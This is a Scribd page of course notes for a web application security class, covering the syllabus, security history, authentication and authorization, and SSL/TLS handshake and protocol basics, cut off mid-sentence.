0% found this document useful (0 votes)
13 views257 pages

Was Notes

The document outlines a course on Web Application Security, covering fundamentals, secure development, API security, vulnerability assessment, and hacking techniques. It includes course objectives, outcomes, and a detailed syllabus divided into units that address various aspects of web security. Additionally, it discusses the history of software security, common threats, and the importance of implementing security measures in web applications.

Uploaded by

Sowndarya Gowri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
13 views257 pages

Was Notes

The document outlines a course on Web Application Security, covering fundamentals, secure development, API security, vulnerability assessment, and hacking techniques. It includes course objectives, outcomes, and a detailed syllabus divided into units that address various aspects of web security. Additionally, it discusses the history of software security, common threats, and the importance of implementing security measures in web applications.

Uploaded by

Sowndarya Gowri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 257

CCS374 WEB APPLICATION SECURITY L T P C

2 0 2 3

Understand the fundamentals of web application security, focus on wide aspects of secure
development and deployment of web applications,learn how to build secure APIs,learn the basics
Course Objectives: of vulnerability assessment and penetration testing,get an insight about Hacking techniques and
Tools

Unit - I FUNDAMENTALS OF WEB APPLICATION SECURITY 6


The history of Software Security-Recognizing Web Application Security Threats, Web Application Security,
Authentication and Authorization, Secure Socket layer, Transport layer Security, Session Management-Input
Validation
Unit - II SECURE DEVELOPMENT AND DEPLOYMENT 5

Web Applications Security - Security Testing, Security Incident Response Planning,The Microsoft Security Development
Lifecycle (SDL), OWASP Comprehensive Lightweight Application Security Process (CLASP), The Software Assurance
Maturity Model (SAMM)

Unit - III SECURE API DEVELOPMENT 6

API Security- Session Cookies, Token Based Authentication, Securing Natter APIs: Addressing threats with Security
Controls, Rate Limiting for Availability, Encryption, Audit logging, Securing service-to-service APIs: API Keys , OAuth2,
Securing Microservice APIs: Service Mesh, Locking Down Network Connections, Securing Incoming Requests

Unit – IV VULNERABILITY ASSESSMENT AND PENETRATION TESTING 6


Vulnerability Assessment Lifecycle, Vulnerability Assessment Tools: Cloud-based vulnerability scanners,
Host-based vulnerability scanners, Network-based vulnerability scanners, Database- based vulnerability
scanners, Types of Penetration Tests: External Testing, Web Application Testing, Internal Penetration Testing,
SSID or Wireless Testing, Mobile Application Testing.
Unit - V HACKING TECHNIQUES AND TOOLS 7
Social Engineering, Injection, Cross-Site Scripting(XSS), Broken Authentication and Session Management,
Cross-Site Request Forgery, Security Misconfiguration, Insecure Cryptographic Storage, Failure to Restrict
URL Access, Tools: Comodo, OpenVAS, Nexpose, Nikto, Burp Suite, etc.
Total Periods: 30

Course Outcomes

On completion of the course, the student can

COs Statements K-Level

CO1 Understanding the basic concepts of web application security and the need for it
K2
CO2 Explain the process for secure development and deployment of web applications K2

Apply the skill to design and develop Secure Web Applications that use Secure APIs
CO3 K3
Experiment with the importance of carrying out vulnerability assessment and penetration K3
CO4 testing
Apply the skill to think like a hacker and to use hackers tool sets K3
CO5

Knowledge Level: K1 – Remember, K2 – Understand, K3 – Apply, K4 – Analyze, K5 – Evaluate, K6 – Create


CO – PO – PSO Articulation Matrix

Programme Outcomes PSO

01 02 03 04 05 06 07 08 09 10 11 12 01 02 03
1
CO1 1 2 2 1 3 - - - - - - 2 2 1
-
CO2 2 1 2 1 3 - - - - - - 2 2 1
1
CO3 1 1 1 2 3 - - - - - - 2 2 1
-
CO4 1 2 1 1 2 - - - - - - 2 2 1
1
CO5 1 2 2 2 2 - - - - - - 2 2 1

CO 1 2 2 2 3 - - - - - - 1 2 2 1

Correlation levels 1, 2 and 3 are as defined below:

1. Slight 2. Moderate 3. Substantial (High)

Text Books

1 Andrew Hoffman, Web Application Security: Exploitation and Countermeasures for Modern Web
Applications, First Edition, 2020, O’Reilly Media, Inc.
Bryan Sullivan, Vincent Liu, Web Application Security: A Beginners Guide, 2012, The McGraw-
2
Hill Companies.
3
Neil Madden, API Security in Action, 2020, Manning Publications Co., NY, USA.

Reference Books

1 Michael Cross, Developer’s Guide to Web Application Security, 2007, Syngress Publishing, Inc.

Ravi Das and Greg Johnson, Testing and Securing Web Applications, 2021, Taylor & Francis
2 Group, LLC.

3 Prabath Siriwardena, Advanced API Security, 2020, Apress Media LLC, USA.

4 Malcom McDonald, Web Security for Developers, 2020, No Starch Press, Inc.
Allen Harper, Shon Harris, Jonathan Ness, Chris Eagle, Gideon Lenkey, and Terron Williams
5 Grey Hat Hacking: The Ethical Hacker’s Handbook, Third Edition, 2011, The
McGraw-Hill Companies.

DEPARTMENT OF AI&DS Page 2


CCS374 WEB APPLICATION SECURITY

The history of Software Security-Recognizing Web Application Security Threats


The history of software security, particularly in the context of recognizing web application
security threats, is marked by the evolution of technology and the increasing sophistication of
cyber threats. Below is a brief overview of key milestones and developments in the history of
web application security:

1. **1990s - The Emergence of the World Wide Web:**


- The World Wide Web became publicly accessible, leading to the proliferation of
websites and web applications.

- The focus during this period was on building and expanding the web, with limited
attention to security considerations.

2. **Late 1990s to Early 2000s - Rise of Common Vulnerabilities:**


- As web applications grew in complexity, security vulnerabilities
became more apparent.

- Common vulnerabilities such as buffer overflows, SQL injection, and cross-


site scripting (XSS) started to emerge.

- The concept of input validation gained attention as a crucial aspect of web


application security.

3. **2002 - The Birth of OWASP:**

DEPARTMENT OF AI&DS Page 3


- The Open Web Application Security Project (OWASP) was founded to provide
resources and guidelines for improving web application security.

- The OWASP Top Ten, a list of the most critical web application security risks, was
introduced to raise awareness about common vulnerabilities.

4. **Mid-2000s - Proliferation of Web 2.0 and AJAX:**


- The advent of Web 2.0 technologies and the use of Asynchronous JavaScript and
XML (AJAX) introduced new attack vectors.

- Security researchers and attackers began to exploit vulnerabilities related to the


dynamic and interactive nature of these technologies.

5. **Late 2000s - Increased Focus on Secure Development Practices:**


- Organizations started recognizing the importance of integrating security into the
software development life cycle.

- Secure coding practices and tools became more prevalent, emphasizing the need to
consider security from the design phase onward.

6. **2010s - Evolution of Threat Landscape:**


- The threat landscape continued to evolve with the rise of mobile applications,
cloud computing, and APIs.

- Web security standards like HTTP Strict Transport Security (HSTS) and Content
Security Policy (CSP) gained adoption to enhance protection against various attacks.

DEPARTMENT OF AI&DS Page 4


7. **2017 - OWASP Top 10 Update:**
- OWASP updated its Top 10 list to reflect contemporary web application security risks,
including issues like insufficient logging and monitoring and XML external entity (XXE)
vulnerabilities.

8. **2020s - Emphasis on DevSecOps and Automation:**


- The integration of security into DevOps processes (DevSecOps) gained
momentum, emphasizing collaboration between development, operations, and
security teams.

- Automation tools for code analysis, vulnerability scanning, and penetration testing
became essential for identifying and mitigating security issues early in the development
cycle.

9. **Present - Ongoing Challenges and Innovations:**


- Web application security remains an ongoing challenge due to the ever-evolving nature
of cyber threats.

- Innovations such as artificial intelligence and machine learning are being


employed to enhance threat detection and response capabilities.

Overall, the history of software security in the context of web applications highlights the
continual need for vigilance, education, and proactive measures to address emerging threats in
an increasingly interconnected digital landscape.

The Origins of Hacking

In the past two decades, hackers have gained more publicity and notoriety than ever before. As
a result, it’s easy for anyone without

DEPARTMENT OF AI&DS Page 5


the appropriate background to assume that hacking is a concept closely tied to the
internet and that most hackers emerged in the last 20 years.

The Enigma Machine, Circa 1930


The Enigma machine used electric-powered mechanical rotors to both encrypt and decrypt
text-based messages sent over radio waves (see Figure 1-1). The device had German origins
and would become an important technological development during the Second World War.

Automated Enigma Code Cracking, Circa 1940

Alan Turing was an English mathematician who is best known for his development of a test
known today as the “Turing test.” The Turing test was developed to rate conversations
generated by machines based on the difficulty in differentiating those conversations from
the conversations of real human beings. This test is often considered to be one of the
foundational philosophies in the field of artificial intelligence (AI).

Introducing the “Bombe”

A bombe was an electric-powered mechanical device that attempted to automatically


reverse engineer the position of mechanical rotors in an Enigma machine based on
mechanical analysis of messages sent from such machines

Telephone “Phreaking,” Circa 1950

After the rise of the Enigma machine in the 1930s and the cryptographic battle that occurred
between major world powers, the introduction of the telephone is the next major event in our
timeline. The telephone allowed everyday people to communicate with each

DEPARTMENT OF AI&DS Page 6


other over large distances, and at rapid speed. As telephone networks grew, they required
automation in order to function at scale.

Anti-Phreaking Technology, Circa 1960

In the 1960s, phones were equipped with a new technology known as dual-tone
multifrequency (DTMF) signaling. DTMF was an audio- based signaling language developed
by Bell Systems and patented under the more commonly known trademark, “Touch Tones.”
DTMF was intrinsically tied to the phone dial layout we know today that consists of three
columns and four rows of numbers. Each key on a DTMF phone emitted two very specific
audio frequencies, versus a single frequency like the original tone dialing systems.

Web Applica琀椀on Security

**Introduction to Web Application Security:**

Web application security refers to the set of measures and practices designed to protect web
applications from various cyber threats, vulnerabilities, and unauthorized access. With the
increasing reliance on web-based technologies for business operations, e-commerce, and
communication, ensuring the security of web applications is crucial to safeguard sensitive data
and maintain the integrity and availability of online services.

**Definition of Web Application Security:**

Web application security involves implementing mechanisms and best practices to identify,
prevent, and mitigate security risks that may arise in the development, deployment, and
maintenance of web applications. It encompasses a broad range of techniques and strategies
aimed at protecting against common vulnerabilities and attacks that can exploit weaknesses
in web application code, configuration, and user interactions.

DEPARTMENT OF AI&DS Page 7


**Types of Web Application Security:**

1. **Network Security:**
- Focuses on securing the communication channels between users and web
applications. This includes encryption protocols (HTTPS), firewalls, and intrusion
detection/prevention systems.

2. **Authentication and Authorization:**


- Ensures that users are who they claim to be (authentication) and that they have the
appropriate permissions to access specific resources or perform certain actions
(authorization).

3. **Data Validation and Input Sanitization:**


- Involves validating and sanitizing user inputs to prevent injection attacks, such as
SQL injection and cross-site scripting (XSS).

4. **Security Misconfigurations:**
- Addresses issues related to improperly configured security settings, server settings, or
access controls that could expose vulnerabilities.

5. **Cross-Site Request Forgery (CSRF) Protection:**


- Mitigates the risk of attackers tricking users into performing unintended actions on
a web application where they are authenticated.

6. **File Upload Security:**


- Focuses on securing mechanisms that allow users to upload files to prevent the
execution of malicious code or the upload of harmful files.

7. **Security Headers:**

DEPARTMENT OF AI&DS Page 8


- Involves the implementation of HTTP security headers, such as HTTP Strict Transport
Security (HSTS) and Content Security Policy (CSP), to control how browsers handle
content.

8. **Web Application Firewalls (WAF):**


- Adds an additional layer of protection by filtering and monitoring HTTP traffic
between a web application and the internet to detect and block potential threats.

**Pros of Web Application Security:**

1. **Data Protection:** Ensures the confidentiality and integrity of sensitive data


processed by web applications.

2. **User Trust:** Building and maintaining trust among users by providing a secure
online experience, protecting their personal information.

3. **Business Continuity:** Mitigates the risk of disruptions caused by security incidents,


ensuring continuous availability and functionality of web applications.

4. **Regulatory Compliance:** Helps organizations comply with data protection


and privacy regulations by implementing necessary security measures.

5. **Cost Savings:** Proactively addressing security issues during development can save
costs compared to dealing with breaches and their consequences.

6. **Brand Reputation:** Protects the reputation of the organization by preventing


data breaches and security incidents that could damage public perception.

DEPARTMENT OF AI&DS Page 9


**Cons of Web Application Security:**

1. **Resource Intensive:** Implementing and maintaining robust web application


security measures can be resource-intensive, requiring time, expertise, and financial
investment.

2. **Usability Challenges:** Stringent security measures may sometimes impact user


experience and require a careful balance between security and usability.

3. **Complexity:** Web application security can be complex due to the dynamic and
evolving nature of cyber threats, requiring continuous monitoring and adaptation.

4. **False Positives:** Security measures, such as WAFs, may generate false positives,
potentially blocking legitimate traffic and causing inconvenience to users.

5. **Resistance to Change:** Introducing security measures may face resistance


from developers or users accustomed to less secure but more convenient practices.

6. **Ongoing Vigilance:** Cyber threats evolve over time, requiring constant vigilance
and updates to security measures to address new vulnerabilities.

In summary, web application security is a multifaceted field that plays a crucial role in
protecting online assets and user data. While it comes with challenges, the benefits of a
secure web application environment far outweigh the potential drawbacks. Organizations
must adopt a holistic and proactive approach to address security concerns and create a
robust defense against cyber threats.

DEPARTMENT OF AI&DS Page 10


Common Web Application Security Threats

1. Insecure Design

2. SQL Injection

3. Faulty Access Control

4. Authorization Failure

5. Security Misconfiguration

6. Outdated Components

7. Security Logging and Monitoring Failures


Authentication and Authorization
Authentication and authorization are fundamental components of web application security,
ensuring that users access only the resources and functionalities they are allowed to. Let's delve
into each of these concepts:

### Authentication:

**Definition:**
Authentication is the process of verifying the identity of a user, system, or application. In the
context of web applications, it involves confirming that the user is who they claim to be.

**Key Elements:**

DEPARTMENT OF AI&DS Page 11


1. **Credentials:** Users typically provide credentials such as usernames and passwords,
though other factors like biometrics, smart cards, or two-factor authentication can be used
for stronger authentication.

2. **Authentication Factors:**
- **Something You Know:** Passwords, PINs.
- **Something You Have:** Smart cards, security tokens.
- **Something You Are:** Biometrics like fingerprints, retina scans.

**Authentication Methods:**

1. **Single-Factor Authentication (SFA):**


- Relies on one authentication factor (e.g., password only).

2. **Multi-Factor Authentication (MFA):**


- Requires two or more authentication factors, enhancing security.

**Best Practices:**

1. **Strong Password Policies:** Encourage users to create complex passwords and update
them regularly.

2. **Multi-Factor Authentication:** Implement MFA to add an extra layer of security.

3. **Secure Transmission:** Ensure that authentication credentials are transmitted


securely over encrypted connections (e.g., HTTPS).

DEPARTMENT OF AI&DS Page 12


### Authorization:

**Definition:**
Authorization is the process of granting or denying access to specific resources, functionalities,
or data based on the authenticated user's permissions.

**Key Elements:**

1. **Roles and Permissions:** Users are assigned roles, and each role has specific
permissions defining what actions or data the user can access.

2. **Access Control Lists (ACLs):** Lists specifying the permissions assigned to each user
or system.

**Authorization Models:**

1. **Role-Based Access Control (RBAC):**


- Users are assigned roles, and roles are associated with specific permissions.

2. **Attribute-Based Access Control (ABAC):**


- Access decisions are based on attributes of the user, the resource, and the environment.

**Best Practices:**

1. **Principle of Least Privilege (PoLP):**

DEPARTMENT OF AI&DS Page 13


- Users should have the minimum level of access necessary to perform their job
functions.

2. **Regular Access Reviews:**


- Periodically review and update user roles and permissions to ensure they align
with current requirements.

3. **Fine-Grained Authorization:**
- Implement granular controls, specifying permissions at a detailed level rather than
granting broad access.

**Authentication and Authorization Workflow:**

1. **Authentication:**
- User provides credentials.
- Credentials are verified against stored credentials (e.g., in a database).
- If credentials are valid, the user is authenticated.

2. **Authorization:**
- Authenticated user's permissions are checked.
- Access is granted or denied based on the user's permissions.
- Users can access only the resources and perform only the actions permitted by their
role and permissions.

**Challenges and Considerations:**

1. **Session Management:**

DEPARTMENT OF AI&DS Page 14


- Securely manage user sessions to prevent unauthorized access or session hijacking.

2. **Token Security:**
- If using tokens for authentication, ensure they are securely generated,
transmitted, and validated.

3. **User Provisioning and Deprovisioning:**


- Implement effective processes for adding, updating, and removing user accounts to
ensure accurate access control.

In summary, a robust web application security strategy involves effective authentication and
authorization mechanisms. These components work together to verify user identities and
control access to resources, helping to prevent unauthorized access and protect sensitive data.

Introduction:

Authentication and authorization are fundamental components of web application security.


Properly implementing these mechanisms is crucial to safeguard sensitive data, protect user
privacy, and prevent unauthorized access. In this blog, we will explore best practices for
implementing authentication and authorization in web applications, drawing insights from
CronJ, a leading technology company specializing in web application security solutions.

The Importance of Authentication and Authorization:

Authentication verifies the identity of users, ensuring they are who they claim to be, while
authorization determines the actions and resources a user

DEPARTMENT OF AI&DS Page 15


is allowed to access within an application. Together, these mechanisms form the foundation of
web application security.

Implementing Secure Authentication:

2.1 Strong Password Policies: Enforce password complexity rules, such as minimum length,
combination of characters, and regular password updates. Encourage the use of password
managers and multi-factor authentication (MFA) for added security.

2.2 Secure Credential Storage: Utilize strong encryption algorithms to store user passwords
securely. Avoid storing plain-text passwords or using weak hashing algorithms.

2.3 Implementing MFA: Implement multi-factor authentication, which combines multiple


authentication factors such as passwords, biometrics, or one-time codes. This adds an extra
layer of security, making it harder for unauthorized users to gain access.

Ensuring Robust Authorization:

3.1 Role-Based Access Control (RBAC): Implement RBAC to assign specific roles and
permissions to users based on their responsibilities and privileges. This ensures that users
can only access the resources necessary for their job functions.

3.2 Principle of Least Privilege: Adhere to the principle of least privilege, granting users
only the minimum level of access required to perform their tasks. Regularly review and
revoke unnecessary privileges to minimize the risk of unauthorized access.

3.3 Fine-Grained Access Control: Implement fine-grained access control mechanisms,


such as attribute-based access control (ABAC), to define access policies based on specific
user attributes, conditions, or context. This allows for more granular control over resource
authorization.

DEPARTMENT OF AI&DS Page 16


Securing Authentication and Authorization Processes:

4.1 Secure Communication Channels: Use secure protocols like HTTPS/TLS to encrypt
data transmitted between the user’s device and the web application server. This prevents
unauthorized interception and protects sensitive information.

4.2 User Session Management: Implement secure session management techniques, such as
session timeouts, secure cookie settings, and session revocation upon logout or inactivity.
This prevents session hijacking and unauthorized access to user accounts.

4.3 Regular Security Updates and Patches: Stay updated with the latest security patches and
updates for the web application framework, libraries, and dependencies used. This helps
address security vulnerabilities and protect against emerging threats.

CronJ’s Expertise in Web Application Security Solutions:

CronJ offers expertise in web application security solutions, providing comprehensive


measures to enhance authentication and authorization processes. Their services
include:

5.1 Security Audits and Assessments: CronJ conducts security audits and assessments to
identify vulnerabilities, assess risks, and recommend remediation strategies for
authentication and authorization processes in web applications.

5.2 Implementation of Secure Authentication and Authorization: CronJ assists in


implementing robust authentication and authorization mechanisms tailored to the specific
needs of web applications. They leverage industry best practices and cutting-edge
technologies to ensure secure user access.

DEPARTMENT OF AI&DS Page 17


5.3 Security Training and Education: CronJ offers security training and education
programs to empower developers and stakeholders with the knowledge and skills to
implement and maintain secure authentication and authorization practices.

Conclusion:

Implementing strong authentication and authorization mechanisms is essential for web


application security. By following best practices such as secure authentication, robust
authorization, and regular security updates, web applications can effectively protect user data
and prevent unauthorized access. With CronJ’s expertise in web application security solutions,
organizations can enhance their authentication and authorization processes
to ensure a secure and trusted web environment
Secure Socket layer

Secure Socket Layer (SSL) provides security to the data that is transferred between web browser
and server. SSL encrypts the link between a web server and a browser which ensures that all
data passed between them remain private and free from attack.
Secure Socket Layer Protocols:
 SSL record protocol
 Handshake protocol
 Change-cipher spec protocol
 Alert protocol

DEPARTMENT OF AI&DS Page 18


SSL Protocol Stack:

SSL Record Protocol:


SSL Record provides two services to SSL connection.
 Confidentiality
 Message Integrity
In the SSL Record Protocol application data is divided into fragments. The fragment is
compressed and then encrypted MAC (Message Authentication Code) generated by
algorithms like SHA (Secure Hash Protocol) and MD5 (Message Digest) is appended. After
that encryption of the data is done and in last SSL header is appended to the data.

DEPARTMENT OF AI&DS Page 19


Handshake Protocol:
Handshake Protocol is used to establish sessions. This protocol allows the client and server to
authenticate each other by sending a series of messages to each other. Handshake protocol uses
four phases to complete its cycle.
 Phase-1: In Phase-1 both Client and Server send hello-packets to each other. In
this IP session, cipher suite and protocol version are exchanged for security
purposes.
 Phase-2: Server sends his certificate and Server-key-exchange. The server end
phase-2 by sending the Server-hello-end packet.
 Phase-3: In this phase, Client replies to the server by sending his certificate and
Client-exchange-key.
 Phase-4: In Phase-4 Change-cipher suite occurs and after this the Handshake
Protocol ends.

DEPARTMENT OF AI&DS Page 20


SSL Handshake Protocol Phases diagrammatic representation

Change-cipher Protocol:
This protocol uses the SSL record protocol. Unless Handshake Protocol is completed, the
SSL record Output will be in a pending state. After the handshake protocol, the Pending
state is converted into the current state. Change-cipher protocol consists of a single message
which is 1 byte in length and can have only one value. This protocol’s purpose is to cause the
pending state to be copied into the current state.

DEPARTMENT OF AI&DS Page 21


Alert Protocol:
This protocol is used to convey SSL-related alerts to the peer entity. Each message in this
protocol contains 2 bytes.

The level is further classified into two parts:

Warning (level = 1):


This Alert has no impact on the connection between sender and receiver. Some of them
are:
Bad certificate: When the received certificate is corrupt.
No certificate: When an appropriate certificate is not available.
Certificate expired: When a certificate has expired.
Certificate unknown: When some other unspecified issue arose in processing the certificate,
rendering it unacceptable.
Close notify: It notifies that the sender will no longer send any messages in the connection.
Unsupported certificate: The type of certificate received is not supported.
Certificate revoked: The certificate received is in revocation list.

Fatal Error (level = 2):


This Alert breaks the connection between sender and receiver. The connection will be
stopped, cannot be resumed but can be restarted. Some of them are :
Handshake failure: When the sender is unable to negotiate an acceptable set of security
parameters given the options available.
Decompression failure: When the decompression function receives improper input.
Illegal parameters: When a field is out of range or inconsistent with other fields.
Bad record MAC: When an incorrect MAC was received. Unexpected message:
When an inappropriate message is received. The second byte in the Alert protocol
describes the error.
Salient Features of Secure Socket Layer:
 The advantage of this approach is that the service can be tailored to the specific
needs of the given application.
 Secure Socket Layer was originated by Netscape.
 SSL is designed to make use of TCP to provide reliable end-to-end secure
service.

DEPARTMENT OF AI&DS Page 22


 This is a two-layered protocol.
Versions of SSL:
SSL 1 – Never released due to high insecurity. SSL 2 –
Released in 1995.
SSL 3 – Released in 1996.
TLS 1.0 – Released in 1999.
TLS 1.1 – Released in 2006.
TLS 1.2 – Released in 2008.
TLS 1.3 – Released in 2018.

SSL (Secure Sockets Layer) certificate is a digital certificate used to secure and verify the
identity of a website or an online service. The certificate is issued by a trusted third-party
called a Certificate Authority (CA), who verifies the identity of the website or service before
issuing the certificate. The SSL certificate has several important characteristics that make it a
reliable solution for securing online transactions:
1. Encryption: The SSL certificate uses encryption algorithms to secure the
communication between the website or service and its users. This ensures that
the sensitive information, such as login credentials and credit card information,
is protected from being intercepted and read by unauthorized parties.
2. Authentication: The SSL certificate verifies the identity of the website or service,
ensuring that users are communicating with the intended party and not with an
impostor. This provides assurance to users that their information is being
transmitted to a trusted entity.
3. Integrity: The SSL certificate uses message authentication codes (MACs) to
detect any tampering with the data during transmission. This ensures that the
data being transmitted is not modified in any way, preserving its integrity.
4. Non-repudiation: SSL certificates provide non-repudiation of data, meaning that
the recipient of the data cannot deny having received it. This is important in
situations where the authenticity of the information needs to be established, such
as in e-commerce transactions.
5. Public-key cryptography: SSL certificates use public-key cryptography for secure
key exchange between the client and server. This allows the client and server to
securely exchange encryption keys, ensuring that the encrypted information can
only be decrypted by the intended recipient.
6. Session management: SSL certificates allow for the management of secure
sessions, allowing for the resumption of secure sessions

DEPARTMENT OF AI&DS Page 23


after interruption. This helps to reduce the overhead of establishing a new secure
connection each time a user accesses a website or service.
7. Certificates issued by trusted CAs: SSL certificates are issued by trusted CAs,
who are responsible for verifying the identity of the website or service before
issuing the certificate. This provides a high level of trust and assurance to users
that the website or service they are communicating with is authentic and
trustworthy.
In addition to these key characteristics, SSL certificates also come in various levels of
validation, including Domain Validation (DV), Organization Validation (OV), and Extended
Validation (EV). The level of validation determines the amount of information that is verified
by the CA before issuing the certificate, with EV certificates providing the highest level of
assurance and trust to users.For more information about SSL certificates for each Validation
level type, please refer to Namecheap.
Overall, the SSL certificate is an important component of online security, providing encryption,
authentication, integrity, non-repudiation, and other key features that ensure the secure and
reliable transmission of sensitive information over the internet.
Refer to the difference between Secure Socket Layer (SSL) and Transport Layer Security (TLS)
Secure Socket Layer (SSL) is a cryptographic protocol designed to provide secure
communication over a computer network. SSL has been succeeded by Transport Layer
Security (TLS), but the term "SSL" is often used colloquially to refer to both SSL and TLS.
The primary use of SSL/TLS in web application security is to establish a secure and
encrypted connection between a web server and a client, typically a web browser. This
secure connection helps protect sensitive data during transmission, preventing unauthorized
access and tampering. Here are key aspects of SSL/TLS in web application security:

### 1. **Encryption:**

- **Purpose:** SSL/TLS encrypts data exchanged between the web server and the client,
ensuring that even if intercepted, the data remains unreadable without the appropriate
decryption key.

- **Implementation:** The encryption process involves using cryptographic


algorithms to transform data into an unreadable format (cipher text) that can only be
deciphered by the intended recipient.

DEPARTMENT OF AI&DS Page 24


### 2. **Authentication:**

- **Purpose:** SSL/TLS provides a means for the client to verify the authenticity of
the server and, in some cases, vice versa. This helps users ensure they are connecting to a
legitimate and trusted website.

- **Certificates:** SSL/TLS uses digital certificates to establish the identity of the server.
Certificates are issued by Certificate Authorities (CAs) and contain information about the
server's identity.

### 3. **Data Integrity:**

- **Purpose:** SSL/TLS ensures that the data transmitted between the client and the
server has not been tampered with during transmission.

- **Hash Functions:** Cryptographic hash functions are used to generate checksums


(hashes) for the transmitted data. The recipient can verify the integrity of the data by
comparing the received hash with the calculated hash.

### 4. **Secure Handshake:**

- **Purpose:** Before establishing a secure connection, the client and server perform
a handshake to negotiate the encryption algorithms and exchange necessary parameters.

- **Key Exchange:** During the handshake, a process called key exchange occurs, where
the client and server agree on a shared secret key for encrypting and decrypting data.

### 5. **HTTPS (HTTP Secure):**

- **Purpose:** SSL/TLS is commonly implemented in web applications using HTTPS,


which stands for HTTP Secure. It is the secure version of the HTTP protocol and uses
SSL/TLS to provide a secure connection.

- **URL Prefix:** URLs using HTTPS start with "https://" instead of "http://".

DEPARTMENT OF AI&DS Page 25


### 6. **TLS Versions:**

- **Evolution:** Over time, various versions of TLS have been released to address
vulnerabilities and improve security. It is essential to use the latest and most secure version
supported by both the server and the client.

- **Compatibility:** While newer versions of TLS are more secure, compatibility


issues may arise with older systems. Striking a balance between security and
compatibility is crucial.

### 7. **SSL/TLS Offloading:**

- **Purpose:** In some architectures, SSL/TLS termination or offloading occurs at a


dedicated device or load balancer before reaching the web server. This can improve
performance and scalability.

- **Encryption at the Edge:** Offloading moves the burden of SSL/TLS processing


from the web server to a dedicated device, allowing the server to focus on handling
application logic.

### 8. **Perfect Forward Secrecy (PFS):**

- **Purpose:** PFS is an additional security feature that ensures that even if a long-term
secret key is compromised, past communication cannot be decrypted.

- **Key Agreement Protocols:** PFS is typically achieved using key agreement


protocols like Diffie-Hellman.

### 9. **Security Best Practices:**

- **Regular Certificate Renewal:** SSL/TLS certificates have an expiration date.


Regularly renew certificates to maintain the security of the connection.

- **Cipher Suite Configuration:** Ensure that the web server is configured to use strong
and secure cipher suites, and disable support for weak or vulnerable algorithms.

- **HSTS (HTTP Strict Transport Security):** Implement HSTS to enforce the use of
HTTPS, reducing the risk of downgrade attacks.

DEPARTMENT OF AI&DS Page 26


SSL/TLS plays a critical role in securing data in transit, and its adoption is a fundamental
practice in modern web application security. Organizations should stay informed about the
latest developments in SSL/TLS protocols and best practices to maintain a secure online
environment.
Transport layer Security
Transport Layer Securities (TLS) are designed to provide security at the transport layer.
TLS was derived from a security protocol called Secure Socket Layer (SSL). TLS ensures
that no third party may eavesdrop or tampers with any message.
There are several benefits of TLS:

 Encryption:
TLS/SSL can help to secure transmitted data using encryption.
 Interoperability:
TLS/SSL works with most web browsers, including Microsoft Internet Explorer
and on most operating systems and web servers.
 Algorithm flexibility:
TLS/SSL provides operations for authentication mechanism, encryption
algorithms and hashing algorithm that are used during the secure session.
 Ease of Deployment:
Many applications TLS/SSL temporarily on a windows server 2003 operating
systems.
 Ease of Use:
Because we implement TLS/SSL beneath the application layer, most of its
operations are completely invisible to client.

Working of TLS:
The client connect to server (using TCP), the client will be something. The client sends
number of specification:
1. Version of SSL/TLS.
2. which cipher suites, compression method it wants to use.
The server checks what the highest SSL/TLS version is that is supported by them both,
picks a cipher suite from one of the clients option (if it supports one) and optionally picks a
compression method. After this the basic setup is done, the server provides its certificate.
This certificate must be trusted either by the client itself or a party that the client trusts.
Having verified the certificate and being certain this server really is who he claims to be
(and not a

DEPARTMENT OF AI&DS Page 27


man in the middle), a key is exchanged. This can be a public key,
“PreMasterSecret” or simply nothing depending upon cipher suite.
Both the server and client can now compute the key for symmetric encryption. The
handshake is finished and the two hosts can communicate securely. To close a connection
by finishing. TCP connection both sides will know the connection was improperly
terminated. The connection cannot be compromised by this through, merely interrupted.
Transport Layer Security (TLS) is a cryptographic protocol designed to provide secure
communication over a computer network. TLS is the successor to Secure Sockets Layer
(SSL), and it is commonly used to secure data transmission on the internet, particularly in
web applications. TLS ensures the confidentiality, integrity, and authenticity of the data
exchanged between a client (typically a web browser) and a server. Here are key aspects of
TLS in web application security:

### 1. **Encryption:**

- **Purpose:** TLS encrypts data during transmission, ensuring that even if intercepted,
the data remains confidential.

- **Symmetric and Asymmetric Encryption:** TLS uses a combination of symmetric


and asymmetric encryption. Symmetric encryption is used for bulk data transfer, while
asymmetric encryption is used for key exchange and authentication.

### 2. **Authentication:**

- **Purpose:** TLS provides a mechanism for both the client and the server to
authenticate each other, ensuring that they are communicating with the intended and
legitimate parties.

- **Digital Certificates:** TLS relies on digital certificates to verify the identity of the
server (and optionally, the client). Certificates are issued by Certificate Authorities
(CAs) and contain information such as the public key and details about the entity's
identity.

### 3. **Data Integrity:**

DEPARTMENT OF AI&DS Page 28


- **Purpose:** TLS ensures that the data transmitted between the client and the server
has not been tampered with during transmission.

- **Hash Functions:** Cryptographic hash functions are used to generate checksums


(hashes) for the transmitted data. The recipient can verify the integrity of the data by
comparing the received hash with the calculated hash.

### 4. **Secure Handshake:**

- **Purpose:** Before establishing a secure connection, the client and server perform a
handshake to negotiate the encryption algorithms, exchange necessary parameters, and
authenticate each other.

- **Key Exchange:** During the handshake, a process called key exchange occurs,
where the client and server agree on a shared secret key for encrypting and decrypting data.

### 5. **Forward Secrecy:**

- **Purpose:** TLS supports Perfect Forward Secrecy (PFS), ensuring that even if a
long-term secret key is compromised, past communication cannot be decrypted.

- **Key Agreement Protocols:** PFS is typically achieved using key agreement


protocols like Diffie-Hellman.

### 6. **Versions:**

- **Evolution:** TLS has undergone several versions, with each version addressing
security vulnerabilities and improving cryptographic mechanisms.

- **Current Versions:** As of my last knowledge update in January 2022, TLS 1.3 is


the latest version, offering improved security and performance compared to earlier
versions.

### 7. **Cipher Suites:**

- **Purpose:** Cipher suites are combinations of encryption, hash, and key exchange
algorithms used to secure the connection.

DEPARTMENT OF AI&DS Page 29


- **Choosing Strong Cipher Suites:** It's important to configure the web server to use
strong and secure cipher suites, while disabling support for weak or vulnerable algorithms.

### 8. **TLS in HTTPS:**

- **Implementation:** In web applications, TLS is commonly implemented through


HTTPS (HTTP Secure). This ensures that the communication between the client and the
server occurs over a secure, encrypted connection.

- **URL Prefix:** URLs using HTTPS start with "https://" instead of "http://".

### 9. **Security Best Practices:**

- **Regular Certificate Renewal:** TLS certificates have an expiration date.


Regularly renew certificates to maintain the security of the connection.

- **HSTS (HTTP Strict Transport Security):** Implement HSTS to enforce the use of
